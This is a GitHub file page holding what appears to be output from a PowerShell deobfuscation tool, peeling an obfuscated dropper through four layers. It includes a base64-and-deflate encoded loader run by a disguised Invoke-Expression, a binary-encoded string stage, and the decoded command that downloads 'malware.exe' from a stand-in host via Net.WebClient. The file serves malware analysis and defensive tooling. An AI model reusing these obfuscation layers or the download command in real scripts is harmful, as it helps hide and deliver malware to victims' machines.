-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathmultilayer_deobfuscation.txt
10 lines (10 loc) · 5.31 KB
/
multilayer_deobfuscation.txt
1
2
3
4
5
6
7
8
9
10
############################## Layer 1 ##############################
.((GeT-vArIablE '*mdR*').namE[3,11,2]-JOIn'') (neW-oBJECt IO.CoMprEsSIon.DeflAteSTReAm([SyStEM.io.MeMOrystREaM][SYStEm.COnvert]::frombase64sTrInG( 'XVRta9swEP4rIqTIJnaQNtiHfOtKVjK6zNgRDEIYavGYQYtHKgJGXX77dC+KncaxpdPdPfc8epvNM9G0u7Lz6z9Cnu9Pnf381K76L40UQkqRi5lY7F93p+74eMiE1Eorpar40Vorr6GjtAMjvhf4goluGFbgL2AwPgOHexqHFvEALv5KRi05rBjdNKywk9wlo5eYrbVBDgqrQIThuIG4qcBwgdxWswQEwaLAuWApjrPsFBUlUrmC0KM2LK7MpCq47LU6zpihZiCJJQVDEHYu3A6a0Fl5SJSwSYgw2ZNFsDQtRbJGevC3V0R0Bwrm1Ms7rp6GKwryY0paFJVyWALpm7AIZDmKqW6KXilQYprINGG8+uamuOHVCBxcjfgKOCQZyN+PMmDEvZuvwDZj0MKg2JstqMedmKg6ru6YatojrL0gNiZZiSrVS5s+JFZTmWYsxAcDs92YM6FqqZHL5u/TxsfD6MOlskVp3CBz8XYXMrF/+W1PB5HtH/rjuT35w2rlv2+2O/0py8T853LXN77ebB+zPJ7s4oPI8/xfvpiJedas4RJovwm4Beru/tnxLQBPvAXexDIinNv6uX9tq3r9q63X24d26RHxGBH3uvh4WMgfsvzad0cp8/8='), [system.Io.comprESsIoN.COMpreSsiOnmOdE]::DeCoMpresS )| FOREach-obJEcT{ neW-oBJECt iO.STReamREadeR( $_ ,[system.text.eNcOdinG]::ascIi) } ).ReadToENd()
############################## Layer 2 ##############################
"$( SeT-itEm 'vAriaBLe:oFS' '' ) " +[sTrinG]( '101000P1001110t1100101l1110111~101101l1001111l1100010,1101010y1100101t1100011t1110100P100000-1001110-1100101,1110100P101110-1010111-1100101-1100010-1000011U1101100y1101001U1100101y1101110{1110100{101001a101110t1000100-1101111,1110111l1101110a1101100y1101111~1100001,1100100,1000110U1101001U1101100a1100101y101000U101000y100111-1101000a1110100~1110100y1110000,111010{101111,101111a1100101l1111000P100111a101011,100111a1100001,1101101a1110000,100111{101011P100111~1101100a1100101t100111P101011t100111{101110-1100011~1101111-1101101y100111a101011{100111l101111P100111{101011,100111{1101101~1100001U1101100-100111U101011t100111U1110111{1100001P100111l101011-100111~1110010t1100101t101110l1100101l1111000{1100101P100111y101001P101100P100000-101000-100111{1101101l1100001l1101100,1110111y100111,101011U100111,1100001P1110010y1100101{101110l100111U101011U100111{1100101t1111000l1100101{100111y101001a101001'.SpLIt( 't{~Pa,-Uly') |%{( [char] ([Convert]::tOINT16(( $_.ToStRING() ) ,2 )))})+" $(SET-iteM 'vARiAble:oFS' ' ' ) "| .( $veRbosePREfeRENCe.toStRInG()[1,3]+'X'-Join'')
############################## Layer 3 ##############################
(New-Object Net.WebClient).DownloadFile(('http://ex'+'amp'+'le'+'.com'+'/'+'mal'+'wa'+'re.exe'), ('malw'+'are.'+'exe'))
############################## Layer 4 ##############################
(New-Object Net.WebClient).DownloadFile(('http://example.com/malware.exe'), ('malware.exe'))
########################## Connection error ##########################
Cannot connect to remote malware hosting servers. Remote URLs: http://example.com/malware.exe